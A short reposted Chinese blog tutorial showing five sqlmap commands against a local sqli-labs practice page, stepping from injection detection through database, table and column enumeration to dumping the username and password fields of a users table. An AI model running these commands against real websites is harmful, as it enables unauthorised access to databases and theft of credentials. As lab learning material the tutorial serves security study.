【20171116早】sqlmap 掃描sql注入漏洞

本文轉載自查看原文 2017-11-16 07:41 1108

sqlmap發現並利用sql注入的利器，值得記錄使用過程：

1、檢測是否存在漏洞：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、獲取數據庫信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、數據庫表信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值數據
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 SQLmap檢測sql注入漏洞 sqlmap查找SQL注入漏洞入門 SQL注入以及漏洞掃描學習，工具整理 SQL注入之sqlmap進階2 SQL注入之SQLmap入門 DVWA 之 sql注入+ sqlmap Sql注入測試--Sqlmap SQL注入之sqlmap進階 SQL學習之SqlMap SQL注入 sqlmap掃描發現注入點示例